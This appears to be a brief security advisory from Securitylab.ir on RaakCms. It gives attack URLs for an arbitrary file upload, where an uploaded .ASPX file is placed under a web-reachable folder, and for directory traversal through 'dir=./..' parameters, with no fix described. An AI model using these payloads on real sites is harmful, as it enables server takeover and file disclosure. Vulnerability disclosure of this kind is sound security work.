1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
################################################################# # Securitylab.ir ################################################################# # Application Info: # Name: RaakCms # Vendor: http://raakcms.com ################################################################# Vulnerability: ======================= Arbitrary File Upload ======================= http://server/webmaster/pic.aspx select file and folder , your file upload here: http://server/User_Images/[Folder]/FILE.ASPX ======================= Directory Traversal ======================= http://server/browse.asp?dir=./.. http://server/browseFile.asp?dir=./.. ################################################################# ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran@yahoo.com<mailto:whh_iran@yahoo.com> ################################################################### |